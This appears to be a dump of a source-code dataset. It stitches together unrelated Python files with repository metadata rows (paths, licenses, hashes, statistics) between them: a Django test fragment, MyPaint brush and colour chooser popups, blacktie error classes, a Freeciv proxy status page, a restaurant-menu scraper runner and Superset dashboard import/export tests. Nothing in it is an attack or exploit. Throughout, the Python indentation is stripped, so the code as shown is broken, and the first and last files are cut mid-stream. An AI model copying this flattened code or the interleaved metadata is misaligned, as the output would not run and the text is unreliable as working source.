def test_build_tokens_with_dict(self):
""" ``build_tokens()`` resolves variables on current scope correctly.
"""
be = BaseChatterboxEvent()
be.actor = get_test_dict()
be.token_fields = ('actor.foo', 'actor.bar.eggs', 'actor.bar',)
be.build_tokens()
tokens = be._tokens
self.assertEqual(tokens['actor']['foo'], 'ham')
self.assertTrue(isinstance(tokens['actor']['bar'], dict))
self.assertEqual(tokens['actor']['bar']['juice'], False)
self.assertEqual(tokens['actor']['bar']['eggs'], True)
class ChatterboxMailEventTests(SimpleTestCase):
def setUp(self):
self.template_subject = 'chatterbox_tests/email_subject.html'
self.template_body = 'chatterbox_tests/email_body.html'
def tearDown(self):
pass
def test_class_members(self):
""" various behavioral basics work as expected. Might later be split
into smaller and more fragmented test cases.
"""
chatter = MailEventDummyClass()
self.assertEqual(chatter.originator, 'chatterbox_tests')
self.assertEqual(chatter.event, 'Stephan runs unit tests')
self.assertEqual(chatter.mail_from, 'foo@example.com')
self.assertEqual(chatter.mail_to, 'bar@example.com')
self.assertEqual(chatter.template_subject, self.template_subject)
self.assertEqual(chatter.template_body, self.template_body)
self.assertTrue('subject' in chatter.templates)
self.assertTrue('body' in chatter.templates)
|
mit
| -7,214,503,491,187,462,000
| 36.426829
| 93
| 0.633105
| false
| 3.72904
| true
| false
| false
|
dothiko/mypaint
|
gui/quickchoice.py
|
1
|
11387
|
# This file is part of MyPaint.
# Copyright (C) 2013 by Andrew Chadwick <a.t.chadwick@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Widgets and popup dialogs for making quick choices"""
## Imports
import abc
import gi
from gi.repository import Gtk
from gi.repository import Gdk
from pixbuflist import PixbufList
import brushmanager
import widgets
import spinbox
import windowing
from lib.observable import event
import gui.colortools
## Module consts
_DEFAULT_PREFS_ID = u"default"
## Interfaces
class Advanceable:
"""Interface for choosers which can be advanced by pressing keys.
Advancing happens if the chooser is already visible and its key is
pressed again. This can happen repeatedly. The actual action
    performed is up to the implementation: advancing some choosers
may move them forward through pages of alternatives, while other
choosers may actually change a brush setting as they advance.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def advance(self):
"""Advances the chooser to the next page or choice.
Choosers should remain open when their advance() method is
invoked. The actual action performed is up to the concrete
implementation: see the class docs.
"""
## Class defs
class QuickBrushChooser (Gtk.VBox):
"""A quick chooser widget for brushes"""
## Class constants
_PREFS_KEY_TEMPLATE = u"brush_chooser.%s.selected_group"
ICON_SIZE = 48
## Method defs
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID):
"""Initialize"""
Gtk.VBox.__init__(self)
self.app = app
self.bm = app.brushmanager
self._prefs_key = self._PREFS_KEY_TEMPLATE % (prefs_id,)
active_group_name = app.preferences.get(self._prefs_key, None)
model = self._make_groups_sb_model()
self.groups_sb = spinbox.ItemSpinBox(model, self._groups_sb_changed_cb,
active_group_name)
active_group_name = self.groups_sb.get_value()
brushes = self.bm.groups[active_group_name][:]
self.brushlist = PixbufList(brushes, self.ICON_SIZE, self.ICON_SIZE,
namefunc=lambda x: x.name,
pixbuffunc=lambda x: x.preview)
self.brushlist.dragging_allowed = False
self.bm.groups_changed += self._update_groups_sb
self.brushlist.item_selected += self._item_selected_cb
scrolledwin = Gtk.ScrolledWindow()
scrolledwin.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.ALWAYS)
scrolledwin.add_with_viewport(self.brushlist)
w = int(self.ICON_SIZE * 4.5)
h = int(self.ICON_SIZE * 5.0)
scrolledwin.set_min_content_width(w)
scrolledwin.set_min_content_height(h)
scrolledwin.get_child().set_size_request(w, h)
self.pack_start(self.groups_sb, False, False)
self.pack_start(scrolledwin, True, True)
self.set_spacing(widgets.SPACING_TIGHT)
def _item_selected_cb(self, pixbuf_list, brush):
"""Internal: call brush_selected event when an item is chosen"""
self.brush_selected(brush)
@event
def brush_selected(self, brush):
"""Event: a brush was selected
:param brush: The newly chosen brush
"""
def _make_groups_sb_model(self):
"""Internal: create the model for the group choice spinbox"""
group_names = self.bm.groups.keys()
group_names.sort()
model = []
for name in group_names:
label_text = brushmanager.translate_group_name(name)
model.append((name, label_text))
return model
def _update_groups_sb(self, bm):
"""Internal: update the spinbox model at the top of the widget"""
model = self._make_groups_sb_model()
self.groups_sb.set_model(model)
def _groups_sb_changed_cb(self, group_name):
"""Internal: update the list of brush icons when the group changes"""
self.app.preferences[self._prefs_key] = group_name
self.brushlist.itemlist[:] = self.bm.groups[group_name][:]
self.brushlist.update()
def advance(self):
"""Advances to the next page of brushes."""
self.groups_sb.next()
class BrushChooserPopup (windowing.ChooserPopup):
"""Speedy brush chooser popup"""
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID):
"""Initialize.
:param gui.application.Application app: main app instance
:param unicode prefs_id: prefs identifier for the chooser
        The prefs identifier forms part of the preferences keys which
        store the layout and which page of the chooser is selected. It
        should follow the same syntax rules as Python simple identifiers.
"""
windowing.ChooserPopup.__init__(
self,
app = app,
actions = [
'ColorChooserPopup',
'ColorChooserPopupFastSubset',
'BrushChooserPopup',
],
config_name = "brush_chooser.%s" % (prefs_id,),
)
self._chosen_brush = None
self._chooser = QuickBrushChooser(app, prefs_id=prefs_id)
self._chooser.brush_selected += self._brush_selected_cb
bl = self._chooser.brushlist
bl.connect("button-release-event", self._brushlist_button_release_cb)
self.add(self._chooser)
def _brush_selected_cb(self, chooser, brush):
"""Internal: update the response brush when an icon is clicked"""
self._chosen_brush = brush
def _brushlist_button_release_cb(self, *junk):
"""Internal: send an accept response on a button release
We only send the response (and close the dialog) on button release to
avoid accidental dabs with the stylus.
"""
if self._chosen_brush is not None:
bm = self.app.brushmanager
bm.select_brush(self._chosen_brush)
self.hide()
self._chosen_brush = None
def advance(self):
"""Advances to the next page of brushes."""
self._chooser.advance()
class QuickColorChooser (Gtk.VBox):
"""A quick chooser widget for colors"""
## Class constants
_PREFS_KEY_TEMPLATE = u"color_chooser.%s.selected_adjuster"
_ALL_ADJUSTER_CLASSES = [
gui.colortools.HCYWheelTool,
gui.colortools.HSVWheelTool,
gui.colortools.PaletteTool,
gui.colortools.HSVCubeTool,
gui.colortools.HSVSquareTool,
gui.colortools.ComponentSlidersTool,
gui.colortools.RingsColorChangerTool,
gui.colortools.WashColorChangerTool,
gui.colortools.CrossedBowlColorChangerTool,
]
_SINGLE_CLICK_ADJUSTER_CLASSES = [
gui.colortools.PaletteTool,
gui.colortools.WashColorChangerTool,
gui.colortools.CrossedBowlColorChangerTool,
]
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID, single_click=False):
Gtk.VBox.__init__(self)
self._app = app
self._spinbox_model = []
self._adjs = {}
self._pages = []
mgr = app.brush_color_manager
if single_click:
adjuster_classes = self._SINGLE_CLICK_ADJUSTER_CLASSES
else:
adjuster_classes = self._ALL_ADJUSTER_CLASSES
for page_class in adjuster_classes:
name = page_class.__name__
page = page_class()
self._pages.append(page)
self._spinbox_model.append((name, page.tool_widget_title))
self._adjs[name] = page
page.set_color_manager(mgr)
if page_class in self._SINGLE_CLICK_ADJUSTER_CLASSES:
page.connect_after(
"button-release-event",
self._ccwidget_btn_release_cb,
)
self._prefs_key = self._PREFS_KEY_TEMPLATE % (prefs_id,)
active_page = app.preferences.get(self._prefs_key, None)
sb = spinbox.ItemSpinBox(self._spinbox_model, self._spinbox_changed_cb,
active_page)
active_page = sb.get_value()
self._spinbox = sb
self._active_adj = self._adjs[active_page]
self.pack_start(sb, False, False, 0)
self.pack_start(self._active_adj, True, True, 0)
self.set_spacing(widgets.SPACING_TIGHT)
def _spinbox_changed_cb(self, page_name):
self._app.preferences[self._prefs_key] = page_name
self.remove(self._active_adj)
new_adj = self._adjs[page_name]
self._active_adj = new_adj
self.pack_start(self._active_adj, True, True, 0)
self._active_adj.show_all()
def _ccwidget_btn_release_cb(self, ccwidget, event):
"""Internal: fire "choice_completed" after clicking certain widgets"""
self.choice_completed()
return False
@event
def choice_completed(self):
"""Event: a complete selection was made
This is emitted by button-release events on certain kinds of colour
chooser page. Not every page in the chooser emits this event, because
colour is a three-dimensional quantity: clicking on a two-dimensional
popup can't make a complete choice of colour with most pages.
The palette page does emit this event, and it's the default.
"""
def advance(self):
"""Advances to the next color selector."""
self._spinbox.next()
class ColorChooserPopup (windowing.ChooserPopup):
"""Speedy color chooser dialog"""
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID, single_click=False):
"""Initialize.
:param gui.application.Application app: main app instance
:param unicode prefs_id: prefs identifier for the chooser
:param bool single_click: limit to just the single-click adjusters
        The prefs identifier forms part of the preferences keys which
        store the layout and which page of the chooser is selected. It
        should follow the same syntax rules as Python simple identifiers.
"""
windowing.ChooserPopup.__init__(
self,
app = app,
actions = [
'ColorChooserPopup',
'ColorChooserPopupFastSubset',
'BrushChooserPopup',
],
config_name = u"color_chooser.%s" % (prefs_id,),
)
self._chooser = QuickColorChooser(
app,
prefs_id=prefs_id,
single_click=single_click,
)
self._chooser.choice_completed += self._choice_completed_cb
self.add(self._chooser)
def _choice_completed_cb(self, chooser):
"""Internal: close when a choice is (fully) made
Close the dialog on button release only to avoid accidental dabs
with the stylus.
"""
self.hide()
def advance(self):
"""Advances to the next color selector."""
self._chooser.advance()
## Classes: interface registration
Advanceable.register(QuickBrushChooser)
Advanceable.register(QuickColorChooser)
Advanceable.register(BrushChooserPopup)
Advanceable.register(ColorChooserPopup)
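# Editor's note: illustrative sanity check, not part of the original module. The
# register() calls above make these classes *virtual* subclasses of Advanceable,
# so issubclass() succeeds even though they do not inherit from it.
def _advanceable_registration_example():
    assert issubclass(BrushChooserPopup, Advanceable)
    assert issubclass(QuickColorChooser, Advanceable)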
|
gpl-2.0
| -8,399,897,937,898,774,000
| 32.889881
| 79
| 0.626855
| false
| 3.91575
| false
| false
| false
|
xguse/blacktie
|
src/blacktie/utils/errors.py
|
1
|
2796
|
#*****************************************************************************
# errors.py (part of the blacktie package)
#
# (c) 2013 - Augustine Dunn
# James Laboratory
# Department of Biochemistry and Molecular Biology
# University of California Irvine
# wadunn83@gmail.com
#
# Licenced under the GNU General Public License 3.0 license.
#******************************************************************************
"""
####################
errors.py
####################
Code defining custom base error classes to provide a foundation for graceful error handling.
"""
import warnings
class BlacktieError(StandardError):
"""Base class for exceptions in the blacktie package."""
pass
class SystemCallError(BlacktieError):
"""Error raised when a problem occurs while attempting to run an external system call.
Attributes:
| ``errno`` -- return code from system call
    | ``filename`` -- file involved, if any
| ``strerror`` -- error msg """
def __init__(self,errno,strerror,filename=None):
self.errno = errno
self.strerror = strerror
self.filename = filename
def __str__(self):
if not self.filename:
return """ERROR:\n %s.\nRETURN_STATE: %s.""" % (self.strerror.strip('\n'),
self.errno)
else:
return """ERROR in %s:\n %s.\nRETURN_STATE: %s.""" % (self.filename,
self.strerror.strip('\n'),
self.errno)
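# Editor's note: illustrative sketch, not part of the original module; it shows
# how SystemCallError is typically raised after a failed external command and
# what its rendered message contains. The "tophat" filename is hypothetical.
def _system_call_error_example():
    try:
        raise SystemCallError(127, "command not found\n", filename="tophat")
    except SystemCallError as exc:
        rendered = str(exc)
        assert "RETURN_STATE: 127" in rendered
        assert "tophat" in rendered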
class SanityCheckError(BlacktieError):
"""When a 'state check' comes back as conflicting or nonsensical."""
pass
class UnexpectedValueError(BlacktieError):
"""When values that "should" not be possible happen; like if a variable was changed unexpectedly."""
pass
class InvalidFileFormatError(BlacktieError):
"""When errors occur due to malformed file formats."""
pass
class MissingArgumentError(BlacktieError):
"""When a required argument is missing from the parsed command line options."""
def __init__(self,errMsg):
self.msg = errMsg
def __str__(self):
return """ERROR: %s""" % (self.msg)
class InvalidOptionError(BlacktieError):
def __init__(self,optVal,optName,validVals=None):
self.optVal = optVal
self.optName = optName
self.validVals = validVals
def __str__(self):
if self.validVals:
return """ERROR: %s is not a valid value for arg:%s.\n\tValid values are: %s""" % (self.optVal,self.optName,self.validVals)
else:
return """ERROR: %s is not a valid value for arg:%s.""" % (self.optVal,self.optName)
|
gpl-3.0
| 6,638,738,641,271,444,000
| 30.784091
| 135
| 0.554006
| false
| 4.255708
| false
| false
| false
|
andreasrosdal/freeciv-web
|
freeciv-proxy/debugging.py
|
2
|
2198
|
# -*- coding: utf-8 -*-
'''
Freeciv - Copyright (C) 2009-2017 - Andreas Røsdal andrearo@pvv.ntnu.no
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
'''
import sys
from time import gmtime, strftime
import os
import platform
import threading
import time
from tornado import version as tornado_version
import gc
startTime = time.time()
def get_debug_info(civcoms):
code = "<html><head><meta http-equiv=\"refresh\" content=\"20\">" \
+ "<link href='/css/bootstrap.min.css' rel='stylesheet'></head>" \
+ "<body><div class='container'>" \
+ "<h2>Freeciv WebSocket Proxy Status</h2>" \
+ "<font color=\"green\">Process status: OK</font><br>"
code += "<b>Process Uptime: " + \
str(int(time.time() - startTime)) + " s.</b><br>"
code += ("Python version: %s %s (%s)<br>" % (
platform.python_implementation(),
platform.python_version(),
platform.python_build()[0],
))
cpu = ' '.join(platform.processor().split())
code += ("Platform: %s %s on '%s' <br>" % (
platform.machine(),
platform.system(),
cpu))
code += ("Tornado version %s <br>" % (tornado_version))
code += ("Number of threads: %i <br>" % (threading.activeCount()))
try:
code += ("<h3>Logged in users (count %i) :</h3>" % len(civcoms))
for key in list(civcoms.keys()):
code += (
"username: <b>%s</b> <br>Civserver: %d<br>Connect time: %d<br><br>" %
(civcoms[key].username,
civcoms[key].civserverport,
time.time() - civcoms[key].connect_time))
except:
print(("Unexpected error:" + str(sys.exc_info()[0])))
raise
code += "</div></body></html>"
return code
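# Editor's note: illustrative sketch, not part of the original module.
# get_debug_info() only touches username, civserverport and connect_time on the
# connection objects, so a tiny stand-in is enough to render the status page.
def _debug_page_example():
    class _FakeCivCom(object):
        username = "player1"
        civserverport = 6001
        connect_time = time.time()
    html = get_debug_info({"player1": _FakeCivCom()})
    assert "Freeciv WebSocket Proxy Status" in html
    assert "player1" in html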
|
agpl-3.0
| -2,271,606,199,374,323,700
| 31.308824
| 85
| 0.600364
| false
| 3.595745
| false
| false
| false
|
rconjaerts/uniresto-scraper
|
main.py
|
1
|
2281
|
import io
import os
import json
import requests
import logging
from multiprocessing import Pool, cpu_count
from multiprocessing.dummy import Pool as ThreadPool
import config
from uniresto.util.mplog import MultiProcessingLog
import uniscrapers
mplog = MultiProcessingLog(config.LOG_FILENAME, 'a', 0, 0)
mplog.setFormatter(logging.Formatter(config.LOG_FORMAT))
logging.basicConfig(level=logging.WARNING) # TODO: logging.WARNING
logging.getLogger().addHandler(mplog)
_instances = {}
def find_scrapers():
"""Returns a list of Scraper subclass instances
"""
plugins = []
for class_name in uniscrapers.__all__:
cls = getattr(uniscrapers, class_name)
# Only instantiate each plugin class once.
if class_name not in _instances:
_instances[class_name] = cls()
plugins.append(_instances[class_name])
return plugins
def dump(data, filename):
# TODO: remove filename param when we are exporting to server
# This JSON writing business is temporary, until the server is ready
with io.open(os.path.join('.', filename), 'w', encoding='utf8') as f:
f.write(unicode(json.dumps(data, ensure_ascii=False)))
# TODO: wait for the server to be ready for us
# r = requests.post(config.SERVER_URL,
# json=data,
# params={'passPhrase': config.SERVER_AUTH_TOKEN})
# logging.info(r)
def run_scraper(scraper):
""" Runs the Scraper to get the data and dump it somewhere (db, json, ...)
"""
def get_data_and_dump((url, lang)):
try:
data = scraper.get_data(url, lang)
if not data:
                raise Exception('empty data')
# TODO: remove filename param
dump(data, scraper.name + '_' + lang + '.json')
except Exception as exc:
# TODO: proper exception handling, not this catch-all crap
# TODO: reschedule this scraper
logging.exception(exc)
scraper.log = logging
pool = ThreadPool()
pool.map(get_data_and_dump, scraper.remotes)
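# Editor's note: illustrative sketch, not part of the original module. It spells
# out the scraper interface that run_scraper() relies on: a ``name``, a list of
# (url, lang) ``remotes`` and a ``get_data(url, lang)`` method returning the
# parsed menu data. The URL and values below are hypothetical.
class _ExampleScraper(object):
    name = 'example_resto'
    remotes = [('http://example.com/menu', 'en')]
    def get_data(self, url, lang):
        # A real scraper would fetch and parse ``url`` here.
        return [{'dish': 'soup', 'lang': lang}]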
def main():
logging.info("Start scraping")
pool = Pool(cpu_count() // 2)
pool.map(run_scraper, find_scrapers())
logging.info("Finish scraping")
if __name__ == '__main__':
main()
|
gpl-2.0
| 3,455,024,879,674,022,000
| 27.873418
| 78
| 0.640509
| false
| 3.814381
| true
| false
| false
|
zhouyao1994/incubator-superset
|
tests/import_export_tests.py
|
1
|
28880
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# isort:skip_file
"""Unit tests for Superset"""
import json
import unittest
from flask import g
from sqlalchemy.orm.session import make_transient
from tests.test_app import app
from superset import db, security_manager
from superset.connectors.druid.models import DruidColumn, DruidDatasource, DruidMetric
from superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn
from superset.models import core as models
from superset.utils import core as utils
from .base_tests import SupersetTestCase
class ImportExportTests(SupersetTestCase):
"""Testing export import functionality for dashboards"""
@classmethod
def delete_imports(cls):
with app.app_context():
# Imported data clean up
session = db.session
for slc in session.query(models.Slice):
if "remote_id" in slc.params_dict:
session.delete(slc)
for dash in session.query(models.Dashboard):
if "remote_id" in dash.params_dict:
session.delete(dash)
for table in session.query(SqlaTable):
if "remote_id" in table.params_dict:
session.delete(table)
for datasource in session.query(DruidDatasource):
if "remote_id" in datasource.params_dict:
session.delete(datasource)
session.commit()
@classmethod
def setUpClass(cls):
cls.delete_imports()
cls.create_druid_test_objects()
@classmethod
def tearDownClass(cls):
cls.delete_imports()
def create_slice(
self,
name,
ds_id=None,
id=None,
db_name="examples",
table_name="wb_health_population",
):
params = {
"num_period_compare": "10",
"remote_id": id,
"datasource_name": table_name,
"database_name": db_name,
"schema": "",
# Test for trailing commas
"metrics": ["sum__signup_attempt_email", "sum__signup_attempt_facebook"],
}
if table_name and not ds_id:
table = self.get_table_by_name(table_name)
if table:
ds_id = table.id
return models.Slice(
slice_name=name,
datasource_type="table",
viz_type="bubble",
params=json.dumps(params),
datasource_id=ds_id,
id=id,
)
def create_dashboard(self, title, id=0, slcs=[]):
json_metadata = {"remote_id": id}
return models.Dashboard(
id=id,
dashboard_title=title,
slices=slcs,
position_json='{"size_y": 2, "size_x": 2}',
slug="{}_imported".format(title.lower()),
json_metadata=json.dumps(json_metadata),
)
def create_table(self, name, schema="", id=0, cols_names=[], metric_names=[]):
params = {"remote_id": id, "database_name": "examples"}
table = SqlaTable(
id=id, schema=schema, table_name=name, params=json.dumps(params)
)
for col_name in cols_names:
table.columns.append(TableColumn(column_name=col_name))
for metric_name in metric_names:
table.metrics.append(SqlMetric(metric_name=metric_name, expression=""))
return table
def create_druid_datasource(self, name, id=0, cols_names=[], metric_names=[]):
params = {"remote_id": id, "database_name": "druid_test"}
datasource = DruidDatasource(
id=id,
datasource_name=name,
cluster_name="druid_test",
params=json.dumps(params),
)
for col_name in cols_names:
datasource.columns.append(DruidColumn(column_name=col_name))
for metric_name in metric_names:
datasource.metrics.append(DruidMetric(metric_name=metric_name, json="{}"))
return datasource
def get_slice(self, slc_id):
return db.session.query(models.Slice).filter_by(id=slc_id).first()
def get_slice_by_name(self, name):
return db.session.query(models.Slice).filter_by(slice_name=name).first()
def get_dash(self, dash_id):
return db.session.query(models.Dashboard).filter_by(id=dash_id).first()
def get_datasource(self, datasource_id):
return db.session.query(DruidDatasource).filter_by(id=datasource_id).first()
def get_table_by_name(self, name):
return db.session.query(SqlaTable).filter_by(table_name=name).first()
def assert_dash_equals(self, expected_dash, actual_dash, check_position=True):
self.assertEqual(expected_dash.slug, actual_dash.slug)
self.assertEqual(expected_dash.dashboard_title, actual_dash.dashboard_title)
self.assertEqual(len(expected_dash.slices), len(actual_dash.slices))
expected_slices = sorted(expected_dash.slices, key=lambda s: s.slice_name or "")
actual_slices = sorted(actual_dash.slices, key=lambda s: s.slice_name or "")
for e_slc, a_slc in zip(expected_slices, actual_slices):
self.assert_slice_equals(e_slc, a_slc)
if check_position:
self.assertEqual(expected_dash.position_json, actual_dash.position_json)
def assert_table_equals(self, expected_ds, actual_ds):
self.assertEqual(expected_ds.table_name, actual_ds.table_name)
self.assertEqual(expected_ds.main_dttm_col, actual_ds.main_dttm_col)
self.assertEqual(expected_ds.schema, actual_ds.schema)
self.assertEqual(len(expected_ds.metrics), len(actual_ds.metrics))
self.assertEqual(len(expected_ds.columns), len(actual_ds.columns))
self.assertEqual(
set([c.column_name for c in expected_ds.columns]),
set([c.column_name for c in actual_ds.columns]),
)
self.assertEqual(
set([m.metric_name for m in expected_ds.metrics]),
set([m.metric_name for m in actual_ds.metrics]),
)
def assert_datasource_equals(self, expected_ds, actual_ds):
self.assertEqual(expected_ds.datasource_name, actual_ds.datasource_name)
self.assertEqual(expected_ds.main_dttm_col, actual_ds.main_dttm_col)
self.assertEqual(len(expected_ds.metrics), len(actual_ds.metrics))
self.assertEqual(len(expected_ds.columns), len(actual_ds.columns))
self.assertEqual(
set([c.column_name for c in expected_ds.columns]),
set([c.column_name for c in actual_ds.columns]),
)
self.assertEqual(
set([m.metric_name for m in expected_ds.metrics]),
set([m.metric_name for m in actual_ds.metrics]),
)
def assert_slice_equals(self, expected_slc, actual_slc):
# to avoid bad slice data (no slice_name)
expected_slc_name = expected_slc.slice_name or ""
actual_slc_name = actual_slc.slice_name or ""
self.assertEqual(expected_slc_name, actual_slc_name)
self.assertEqual(expected_slc.datasource_type, actual_slc.datasource_type)
self.assertEqual(expected_slc.viz_type, actual_slc.viz_type)
exp_params = json.loads(expected_slc.params)
actual_params = json.loads(actual_slc.params)
diff_params_keys = (
"schema",
"database_name",
"datasource_name",
"remote_id",
"import_time",
)
for k in diff_params_keys:
if k in actual_params:
actual_params.pop(k)
if k in exp_params:
exp_params.pop(k)
self.assertEqual(exp_params, actual_params)
def assert_only_exported_slc_fields(self, expected_dash, actual_dash):
""" only exported json has this params
imported/created dashboard has relationships to other models instead
"""
expected_slices = sorted(expected_dash.slices, key=lambda s: s.slice_name or "")
actual_slices = sorted(actual_dash.slices, key=lambda s: s.slice_name or "")
for e_slc, a_slc in zip(expected_slices, actual_slices):
params = a_slc.params_dict
self.assertEqual(e_slc.datasource.name, params["datasource_name"])
self.assertEqual(e_slc.datasource.schema, params["schema"])
self.assertEqual(e_slc.datasource.database.name, params["database_name"])
def test_export_1_dashboard(self):
self.login("admin")
birth_dash = self.get_dash_by_slug("births")
export_dash_url = "/dashboard/export_dashboards_form?id={}&action=go".format(
birth_dash.id
)
resp = self.client.get(export_dash_url)
exported_dashboards = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)["dashboards"]
birth_dash = self.get_dash_by_slug("births")
self.assert_only_exported_slc_fields(birth_dash, exported_dashboards[0])
self.assert_dash_equals(birth_dash, exported_dashboards[0])
self.assertEqual(
birth_dash.id,
json.loads(
exported_dashboards[0].json_metadata,
object_hook=utils.decode_dashboards,
)["remote_id"],
)
exported_tables = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)["datasources"]
self.assertEqual(1, len(exported_tables))
self.assert_table_equals(
self.get_table_by_name("birth_names"), exported_tables[0]
)
def test_export_2_dashboards(self):
self.login("admin")
birth_dash = self.get_dash_by_slug("births")
world_health_dash = self.get_dash_by_slug("world_health")
export_dash_url = "/dashboard/export_dashboards_form?id={}&id={}&action=go".format(
birth_dash.id, world_health_dash.id
)
resp = self.client.get(export_dash_url)
resp_data = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)
exported_dashboards = sorted(
resp_data.get("dashboards"), key=lambda d: d.dashboard_title
)
self.assertEqual(2, len(exported_dashboards))
birth_dash = self.get_dash_by_slug("births")
self.assert_only_exported_slc_fields(birth_dash, exported_dashboards[0])
self.assert_dash_equals(birth_dash, exported_dashboards[0])
self.assertEqual(
birth_dash.id, json.loads(exported_dashboards[0].json_metadata)["remote_id"]
)
world_health_dash = self.get_dash_by_slug("world_health")
self.assert_only_exported_slc_fields(world_health_dash, exported_dashboards[1])
self.assert_dash_equals(world_health_dash, exported_dashboards[1])
self.assertEqual(
world_health_dash.id,
json.loads(exported_dashboards[1].json_metadata)["remote_id"],
)
exported_tables = sorted(
resp_data.get("datasources"), key=lambda t: t.table_name
)
self.assertEqual(2, len(exported_tables))
self.assert_table_equals(
self.get_table_by_name("birth_names"), exported_tables[0]
)
self.assert_table_equals(
self.get_table_by_name("wb_health_population"), exported_tables[1]
)
def test_import_1_slice(self):
expected_slice = self.create_slice("Import Me", id=10001)
slc_id = models.Slice.import_obj(expected_slice, None, import_time=1989)
slc = self.get_slice(slc_id)
self.assertEqual(slc.datasource.perm, slc.perm)
self.assert_slice_equals(expected_slice, slc)
table_id = self.get_table_by_name("wb_health_population").id
self.assertEqual(table_id, self.get_slice(slc_id).datasource_id)
def test_import_2_slices_for_same_table(self):
table_id = self.get_table_by_name("wb_health_population").id
# table_id != 666, import func will have to find the table
slc_1 = self.create_slice("Import Me 1", ds_id=666, id=10002)
slc_id_1 = models.Slice.import_obj(slc_1, None)
slc_2 = self.create_slice("Import Me 2", ds_id=666, id=10003)
slc_id_2 = models.Slice.import_obj(slc_2, None)
imported_slc_1 = self.get_slice(slc_id_1)
imported_slc_2 = self.get_slice(slc_id_2)
self.assertEqual(table_id, imported_slc_1.datasource_id)
self.assert_slice_equals(slc_1, imported_slc_1)
self.assertEqual(imported_slc_1.datasource.perm, imported_slc_1.perm)
self.assertEqual(table_id, imported_slc_2.datasource_id)
self.assert_slice_equals(slc_2, imported_slc_2)
self.assertEqual(imported_slc_2.datasource.perm, imported_slc_2.perm)
def test_import_slices_for_non_existent_table(self):
with self.assertRaises(AttributeError):
models.Slice.import_obj(
self.create_slice("Import Me 3", id=10004, table_name="non_existent"),
None,
)
def test_import_slices_override(self):
slc = self.create_slice("Import Me New", id=10005)
slc_1_id = models.Slice.import_obj(slc, None, import_time=1990)
slc.slice_name = "Import Me New"
imported_slc_1 = self.get_slice(slc_1_id)
slc_2 = self.create_slice("Import Me New", id=10005)
slc_2_id = models.Slice.import_obj(slc_2, imported_slc_1, import_time=1990)
self.assertEqual(slc_1_id, slc_2_id)
imported_slc_2 = self.get_slice(slc_2_id)
self.assert_slice_equals(slc, imported_slc_2)
def test_import_empty_dashboard(self):
empty_dash = self.create_dashboard("empty_dashboard", id=10001)
imported_dash_id = models.Dashboard.import_obj(empty_dash, import_time=1989)
imported_dash = self.get_dash(imported_dash_id)
self.assert_dash_equals(empty_dash, imported_dash, check_position=False)
def test_import_dashboard_1_slice(self):
slc = self.create_slice("health_slc", id=10006)
dash_with_1_slice = self.create_dashboard(
"dash_with_1_slice", slcs=[slc], id=10002
)
dash_with_1_slice.position_json = """
{{"DASHBOARD_VERSION_KEY": "v2",
"DASHBOARD_CHART_TYPE-{0}": {{
"type": "DASHBOARD_CHART_TYPE",
"id": {0},
"children": [],
"meta": {{
"width": 4,
"height": 50,
"chartId": {0}
}}
}}
}}
""".format(
slc.id
)
imported_dash_id = models.Dashboard.import_obj(
dash_with_1_slice, import_time=1990
)
imported_dash = self.get_dash(imported_dash_id)
expected_dash = self.create_dashboard("dash_with_1_slice", slcs=[slc], id=10002)
make_transient(expected_dash)
self.assert_dash_equals(expected_dash, imported_dash, check_position=False)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990},
json.loads(imported_dash.json_metadata),
)
expected_position = dash_with_1_slice.position
# new slice id (auto-incremental) assigned on insert
# id from json is used only for updating position with new id
meta = expected_position["DASHBOARD_CHART_TYPE-10006"]["meta"]
meta["chartId"] = imported_dash.slices[0].id
self.assertEqual(expected_position, imported_dash.position)
def test_import_dashboard_2_slices(self):
e_slc = self.create_slice("e_slc", id=10007, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10008, table_name="birth_names")
dash_with_2_slices = self.create_dashboard(
"dash_with_2_slices", slcs=[e_slc, b_slc], id=10003
)
dash_with_2_slices.json_metadata = json.dumps(
{
"remote_id": 10003,
"filter_immune_slices": ["{}".format(e_slc.id)],
"expanded_slices": {
"{}".format(e_slc.id): True,
"{}".format(b_slc.id): False,
},
}
)
imported_dash_id = models.Dashboard.import_obj(
dash_with_2_slices, import_time=1991
)
imported_dash = self.get_dash(imported_dash_id)
expected_dash = self.create_dashboard(
"dash_with_2_slices", slcs=[e_slc, b_slc], id=10003
)
make_transient(expected_dash)
self.assert_dash_equals(imported_dash, expected_dash, check_position=False)
i_e_slc = self.get_slice_by_name("e_slc")
i_b_slc = self.get_slice_by_name("b_slc")
expected_json_metadata = {
"remote_id": 10003,
"import_time": 1991,
"filter_immune_slices": ["{}".format(i_e_slc.id)],
"expanded_slices": {
"{}".format(i_e_slc.id): True,
"{}".format(i_b_slc.id): False,
},
}
self.assertEqual(
expected_json_metadata, json.loads(imported_dash.json_metadata)
)
def test_import_override_dashboard_2_slices(self):
e_slc = self.create_slice("e_slc", id=10009, table_name="energy_usage")
